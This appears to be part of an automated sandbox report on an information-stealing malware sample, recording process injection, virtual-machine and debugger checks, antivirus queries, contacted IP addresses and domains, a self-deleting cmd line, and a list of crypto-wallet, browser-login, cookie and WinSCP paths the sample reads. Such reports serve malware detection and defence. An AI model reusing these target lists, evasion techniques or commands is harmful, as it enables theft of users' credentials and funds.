                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\msvcp140.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9EDA.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sdveeeuJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeFile created: C:\Users\user\AppData\Local\Temp\kat796E.tmpJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\4.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sdveeeu:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                Source: sdveeeu, 00000005.00000002.1997292186.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKG
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00503F97 rdtsc 6_2_00503F97
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 363Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1746Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 719Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3159Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 856Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exe TID: 6344Thread sleep count: 363 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep count: 1746 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep time: -174600s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6364Thread sleep count: 719 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6364Thread sleep time: -71900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3220Thread sleep count: 259 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2872Thread sleep count: 295 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3736Thread sleep count: 327 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3736Thread sleep time: -32700s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep count: 3159 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep time: -315900s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 5496Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 3328Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exe TID: 3900Thread sleep count: 59 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFAEBF0 PR_GetNumberOfProcessors,GetSystemInfo,9_2_6CFAEBF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareyst^
                Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: kat796E.tmp, 00000009.00000002.2826699308.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHA
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000052A000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\4.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\4.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\4.exe System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\sdveeeu System information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\4.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\sdveeeu Process queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: 6_2_00503F97 rdtsc
                Source: C:\Users\user\Desktop\4.exe Code function: 0_2_00402A9F LdrLoadDll
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\4.exe Code function: 0_2_02DD0D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\4.exe Code function: 0_2_02DD092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\4.exe Code function: 0_2_02EF19AA push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\sdveeeu Code function: 5_2_02E10D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\sdveeeu Code function: 5_2_02E1092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\sdveeeu Code function: 5_2_030113E2 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: 6_2_004FED1B push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: 6_2_020F092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: 6_2_020F0D90 mov eax, dword ptr fs:[00000030h]

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe File created: 9EDA.exe.1.dr
                Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
                Source: C:\Windows\explorer.exe Network Connect: 190.28.110.209 80
                Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
                Source: C:\Windows\explorer.exe Network Connect: 185.18.245.58 80
                Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
                Source: Yara match File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Code function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess
                Source: C:\Users\user\Desktop\4.exe Thread created: C:\Windows\explorer.exe EIP: 87C19E0
                Source: C:\Users\user\AppData\Roaming\sdveeeu Thread created: unknown EIP: 34119E0
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 value starts with: 4D5A
                Source: F441.exe String found in binary or memory: zippyfinickysofwps.shop
                Source: F441.exe String found in binary or memory: obsceneclassyjuwks.shop
                Source: F441.exe String found in binary or memory: acceptabledcooeprs.shop
                Source: F441.exe String found in binary or memory: whispedwoodmoodsksl.shop
                Source: F441.exe String found in binary or memory: boredimperissvieos.shop
                Source: F441.exe String found in binary or memory: holicisticscrarws.shop
                Source: F441.exe String found in binary or memory: sweetsquarediaslw.shop
                Source: F441.exe String found in binary or memory: plaintediousidowsko.shop
                Source: F441.exe String found in binary or memory: miniaturefinerninewjs.shop
                Source: C:\Users\user\Desktop\4.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\4.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\sdveeeu Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\sdveeeu Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Section unmapped: C:\Users\user\AppData\Local\Temp\kat796E.tmp base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 401000
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 422000
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 42E000
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 641000
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6D0C4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6CFA1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1692760853.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6D07AE71 cpuid
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6D07A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6CFC8390 NSS_GetVersion
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: F441.exe, 00000006.00000003.2416404602.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.0000000000543000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2374105499.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\F441.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
                Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: keystore
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: \\config\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
